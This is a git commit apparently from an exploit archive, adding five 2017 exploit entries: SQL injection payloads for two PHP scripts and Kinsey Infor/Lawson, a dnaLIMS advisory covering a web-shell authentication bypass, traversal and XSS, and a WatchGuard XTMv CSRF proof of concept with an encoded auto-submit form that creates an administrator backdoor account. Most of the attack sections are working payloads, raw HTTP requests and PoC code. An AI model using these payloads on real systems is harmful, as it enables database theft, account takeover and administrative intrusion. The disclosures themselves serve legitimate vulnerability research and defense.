DB: 2017-03-11

5 new exploits

Price Comparison Script 2017.1.8 - SQL Injection
Clickbank Affiliate Marketplace Script 2017 - SQL Injection
Kinsey Infor/Lawson / ESBUS - SQL Injection
WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery
dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-03-11 05:01:19 +00:00
parent 6e7ec5be32
commit f2327bc214
6 changed files with 372 additions and 0 deletions

View file

@ -37488,3 +37488,8 @@ id,file,description,date,author,platform,type,port
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
41575,platforms/php/webapps/41575.txt,"Price Comparison Script 2017.1.8 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
41576,platforms/php/webapps/41576.txt,"Clickbank Affiliate Marketplace Script 2017 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0

Can't render this file because it is too large.

114
platforms/cgi/webapps/41578.txt Executable file
View file

@ -0,0 +1,114 @@
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing
web-application
Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
Date published: Mar 08, 2017
Vendor: dnaTools, Inc.
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
USCERT VU: 929263
Vulnerability Summaries
1) Improperly protected web shell [CVE-2017-6526]
dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
a web shell included with the software running as the web user. However,
sending a POST request to that page bypasses authentication checks,
including the UID parameter within the POST request.
2) Unauthenticated Directory Traversal [CVE-2017-6527]
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
directory traversal attack. This allows an unauthenticated attacker to
retrieve files on the operating system accessible by the permissions of the
web server. This page also does not require authentication, allowing any
person on the Internet to exploit this vulnerability.
3) Insecure Password Storage [CVE-2017-6528]
An option, which is most likely the default, allows the password file
(/home/dna/spool/.pfile) to store clear text passwords. When combined with
the unauthenticated directory traversal vulnerability, it is possible to
gain the username and password for all users of the software and gain
complete control of the software.
4) Session Hijacking [CVE-2017-6529]
Each user of the dnaLIMS software is assigned a unique four-digit user
identification number(UID) upon account creation. These numbers appear to
be assigned sequentially. Multiple pages of the dnaLIMS application require
that this UID be passed as a URL parameter in order to view the content of
the page.
Consider the following example:
The URL ahttp://<SERVER NAME
REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410a is a valid URL
to view the page for sequencing requests for the user with the UID of 2410. The
username parameter of the URL is the mechanism for authentication to the
system. The first eight-digit number of the username parameter appears to
be a session identifier as it changes every time the user logs in from the
password.cgi page, however this value is not checked by the seqreq2N.cgi
page. This allows an attacker to guess the four-digit UID of valid user
accounts that have an active session. The user with the UID of 2419
currently has an active session, so we can simply hijack this useras
session by requesting this page and specifying the UID 2419.
5) Cross-site Scripting
The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
reflected cross site scripting attack via GET request as seen in the
following URL:
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
Alert("XSS") </SCRIPT>
6) Cross-site Scripting
The navUserName parameter of the seqTable*.cgi page is vulnerable to a
reflected cross site scripting attack via POST request as seen in the
example below. The * reflects a short name for a client, (ie Shorebreak
Security may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
vulnerable for all dnaLIMS installs.
7) Improperly Protected Content
Many of the pages within the admin interface are not properly protected
from viewing by authenticated users. This can give an attacker additional
system information about the system, or change system/software
configuration.
Software was conducted on a live production system, therefore the pages
themselves were tested, forms within these pages were not.
This is also not an exhaustive list of improperly protected pages:
cgi-bin/dna/configuration.cgi
cgi-bin/dna/createCoInfo.cgi
cgi-bin/dna/configSystem.cgi
cgi-bin/dna/combineAcctsN.cgi
Disclosure Timeline
Thu, Nov 10, 2016 at 4:25 PM: Reached out to vendor requesting PGP key to
securely exchange details of vulnerabilities identified
Thu, Nov 10, 2016 at 4:55 PM: Vendor requests report be physically mailed
to PO box via Postal Service
Wed, Nov 16, 2016, at 11:14 AM: Report mailed to vendor via USPS Certified
Mail
Thu, Dec 8, 2016, at 10:43 AM: Request Vendor acknowledge receipt of the
report
Thu, Dec 8, 2016, at 12:53 PM: Vendor acknowledges receiptI3/4 suggests
placing the software behind a firewall as a solution to the vulnerabilities.
Thu, Dec 8, 2016, at 1:54 PM: Reply that the offered solution mitigates
some risk, but does not address the vulnerabilitiesI3/4 inquire if there is a
plan to address the vulnerabilities
Thu, Dec 8, 2016, at 3:13 PM: Vendor replies aa|Yes, we have a plan. Please
gather a DNA sequence, PO Number, or Fund Number and go to your local
grocery store and see what it will buy you.a
Tue, Feb 28, 2017, at 1:15 PM: Vulnerabilities disclosed to US-CERT
Tue, Mar 7, 2017, at 8:19 AM: Vulnerabilities submitted to MITRE for CVE
assignment
Wed, Mar 8, 2017, at 12:00 PM: Vulnerabilities disclosed publicly

40
platforms/jsp/webapps/41577.txt Executable file
View file

@ -0,0 +1,40 @@
##################################################################
# Exploit Title: Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections
##################################################################
# Date: 3/10/2017
##################################################################
# Exploit Author: Michael Benich
##################################################################
# Vendor homepage: http://www.kinsey.com/infor-lawson.html
##################################################################
# Version: ALL
##################################################################
# Tested on: Windows Server 2008 R2; MySQL ver 5.5
##################################################################
# CVE: CVE-2017-6550
##################################################################
Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:
1) TABLE parameter, PoC below
GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1
2) Query POST parameter
POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1
<--snip--http headers-->
QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB
A JSP webshell can then be written to the /esbus/ directory.
##################################################################
Timeline:
12/1/2016 - Contacted generic security emails
12/1/2016 - Received response from vendor ("Thanks for the info...")
2/27/2017 - Followed up with contact and intent to disclose. No reply.
3/10/2017 - Disclosure
##################################################################

22
platforms/php/webapps/41575.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/price-comparison-script.php
# Demo: http://www.pricecomparisonscript.info/
# Version: 2017.1.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# http://localhost/[PATH]/compare.php?pid=[SQL]
# For example;
# -100'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20--+-
# axisitp_newpcs
# Etc..
# # # # #

18
platforms/php/webapps/41576.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Clickbank Affiliate Marketplace Script v2017 - SQL Injection
# Google Dork: N/A
# Date: 10.03.2017
# Vendor Homepage: https://www.axisitp.com/
# Software: https://www.axisitp.com/clickbank-affiliate-marketplace-script.php
# Demo: http://www.clickbank.axisitp.com/
# Version: 2017
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
# Etc..
# # # # #

173
platforms/xml/webapps/41579.html Executable file
View file

@ -0,0 +1,173 @@
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
-->
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x70;&#x61;&#x67;&#x65;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x2e;&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x75;&#x73;&#x65;&#x72;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x61;&#x64;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x76;&#x6f;&#x2e;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x6e;&#x61;&#x6d;&#x65;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;"&#x3a;"&#x46;&#x69;&#x72;&#x65;&#x62;&#x6f;&#x78;&#x2d;&#x44;&#x42;"&#x2c;"&#x72;&#x6f;&#x6c;&#x65;"&#x3a;"&#x44;&#x65;&#x76;&#x69;&#x63;&#x65;&#x20;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x69;&#x73;&#x74;&#x72;&#x61;&#x74;&#x6f;&#x72;"&#x2c;"&#x68;&#x61;&#x73;&#x68;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x65;&#x6e;&#x61;&#x62;&#x6c;&#x65;&#x64;"&#x3a;&#x31;&#x2c;"&#x72;&#x6f;&#x77;&#x69;&#x6e;&#x64;&#x65;&#x78;"&#x3a;&#x2d;&#x31;&#x7d;&#x5d;&#x2c;"&#x75;&#x70;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x64;&#x65;&#x6c;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x7d;"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->